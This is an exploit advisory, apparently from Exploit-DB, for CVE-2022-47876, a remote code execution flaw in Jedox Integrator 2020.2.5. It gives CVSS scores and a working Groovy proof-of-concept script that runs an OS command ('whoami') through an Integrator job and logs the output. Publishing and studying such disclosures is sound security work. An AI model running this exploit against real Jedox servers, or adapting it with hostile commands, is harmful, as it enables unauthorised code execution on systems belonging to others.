Jedox 2020.2.5 - Remote Code Execution via Executable Groovy-Scripts

2023-05-0500:00:00

Team Syslifters

www.exploit-db.com

216

jedox integrator

remote code execution

groovy-scripts

cve-2022-47876

syslifters

vulnerability

exploit

integrator

arbitrary code

8.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

8.9 High

AI Score

Confidence

High

0.046 Low

EPSS

Percentile

92.6%

JSON

# Exploit Title: Jedox 2020.2.5 - Remote Code Execution via Executable Groovy-Scripts
# Date: 28/04/2023
# Exploit Author: Syslifters - Christoph Mahrl, Aron Molnar, Patrick Pirker and Michael Wedl
# Vendor Homepage: https://jedox.com
# Version: Jedox 2020.2 (20.2.5) and older
# CVE : CVE-2022-47876


Introduction
=================
Jedox Integrator allows remote authenticated users to create Jobs to execute arbitrary code via Groovy-scripts. To exploit the vulnerability, the attacker must be able to create a Groovy-Job in Integrator.


Write-Up
=================
See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit vulnerability.


Proof of Concept
=================
1) A user with appropriate permissions can create Groovy jobs in the Integrator with arbitrary script code. Run the following groovy script to execute `whoami`. The output of the command can be viewed in the logs:

	def sout = new StringBuilder(), serr = new StringBuilder()
	def proc = 'whoami'.execute()
	proc.consumeProcessOutput(sout, serr)
	proc.waitForOrKill(10000)
	LOG.error(sout.toString());
	LOG.error(serr.toString());